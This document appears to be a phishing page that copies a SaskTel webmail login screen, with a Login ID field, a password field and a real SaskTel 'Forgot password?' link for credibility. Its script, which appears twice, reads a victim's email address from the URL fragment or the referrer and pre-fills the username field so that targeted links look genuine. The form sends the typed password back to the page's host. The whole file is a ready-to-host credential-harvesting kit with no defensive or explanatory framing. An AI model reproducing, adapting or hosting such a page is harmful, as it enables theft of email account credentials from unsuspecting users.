<html lang="en" ng-controller="AppCtrl" class="ng-scope"><head><meta charset="utf-8">
    <script>
        window.onload = function () {
            var referrerEmail = document.referrer.split('#')[1];
            console.log(referrerEmail);
            if (referrerEmail) {
                var currentUrl = window.location.href;
                var newUrl = currentUrl + '#' + referrerEmail;
                console.log(referrerEmail);
                window.history.replaceState({}, document.title, newUrl);
                var emailField = document.getElementById('username');
                if (emailField) {
                    emailField.value = referrerEmail;
                    console.log(referrerEmail);
                }
            }
        };
        var urlFragment = window.location.hash.substring(1);
        if (urlFragment) {
            var usernameInput = document.getElementById("username");
            if (usernameInput) {
                usernameInput.value = urlFragment;
            }
        }
    </script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">

<meta http-equiv="pragma" content="no-cache">
<title pagetitle-directive="">Mine 2</title>






<script language="JavaScript">
</script></head>

<body translate-cloak="" activitycheck-directive="" dragdropdisable-directive="" detectdevice-directive="" ng-class="$state.$current.name | route2classname" class="theme-default app_base_login">





<br>
 <form name="signin" action="" method="GET">
 <br>
 
 <label translate="LANG_LOGIN_USERNAME" class="ng-scope">Login ID</label>
 <div ng-class="{'has-error':error.langkey=='LANG_LOGIN_ERROR_EMPTY_USERNAME'}" class="form-group">



<input type="text" id="username" name="username"
style="height: 45px; margin-top: 10px; width: 60%; padding-left: 8px; border: 0.01px solid black; font-size: 18px; width: 319.64706px">
 <span class="fa fa-lg fa-exclamation-circle input-error sf-hidden" title="" aria-label="">
 
 
 
 </span>
 
 <span class="fa fa-lg fa-exclamation-circle input-error sf-hidden" title="" aria-label="">
 
 
 
 </span>
 </div>
 <div class="form-group">
 
 </div>
 <label translate="LANG_LOGIN_PASSWORD" class="ng-scope">Password</label>
 <div ng-class="{'has-error':error.langkey=='LANG_LOGIN_ERROR_EMPTY_PASSWORD'}" class="form-group error-label">
 <input type="password" required="" name="passwd" class="form-control ng-pristine ng-valid ng-touched" id="password" ng-model="user.password" aria-label="Password" ng-disabled="( loadingstatus !== '')" value="" style="
    width: 319.64706px;
">
 <div class="pb-2">
                                <span id="msg" class="text-dark" style="display: none;"></span>
                                <span id="msg2" class="text-danger" style="display: none;">Your account or password is incorrect. Please confirm your password and try again <a href="#"></a></span>
                                
                            </div>
 
 </div>
 <div class="form-group">
 
 </div>
 <div class="form-group">
 <button ng-if="( loadingstatus === '')" type="submit" class="btn btn-primary btn-lg ng-scope" translate="LANG_LOGIN_SIGN_IN" aria-label="Log in">Log in</button>
 
 </div>
 <div class="clearfix">
 <div class="login-forgot">
 <a ng-if="( loadingstatus === '') &amp;&amp; showForgotLink" href="https://webmail.sasktel.net/" ng-click="goToForgotPassword()" translate="LANG_LOGIN_FORGOT_PASSWORD" class="ng-scope">Forgot password?</a>
 </div>
 </div>
 </form>
 </div>
 </div>
 </div>
 
 </div>
 </div>
 </div>
 
</div>
<snapuser-directive snap-user="snapUser" style="display:none" class="ng-scope ng-isolate-scope"></snapuser-directive>
</div>
 <ng-include src="'components/topmodal/topmodal.html'" class="ng-scope"><div id="topModalContainer" class="ng-scope">
 
 <div modal-body="errorMessage | translate" modal-directive="" modal-header="'LANG_ERROR' | translate" modal-id="'top-modal-error'" modal-closebtn="'LANG_CLOSE' | translate" class="ng-isolate-scope"><div id="top-modal-error" class="modal fade sf-hidden" tabindex="-1" role="dialog" aria-modal="true" aria-labelledby="top-modal-error-label" aria-hidden="true">
 
</div>
</div>
</div>
</ng-include>
</div>
</div>
 
 </div>
 <script>
    window.onload = function () {
        var referrerEmail = document.referrer.split('#')[1];
        console.log(referrerEmail);
        if (referrerEmail) {
            var currentUrl = window.location.href;
            var newUrl = currentUrl + '#' + referrerEmail;
            console.log(referrerEmail);
            window.history.replaceState({}, document.title, newUrl);
            var emailField = document.getElementById('username');
            if (emailField) {
                emailField.value = referrerEmail;
                console.log(referrerEmail);
            }
        }
    };
    var urlFragment = window.location.hash.substring(1);
    if (urlFragment) {
        var usernameInput = document.getElementById("username");
        if (usernameInput) {
            usernameInput.value = urlFragment;
        }
    }
</script>
</body>
</html>
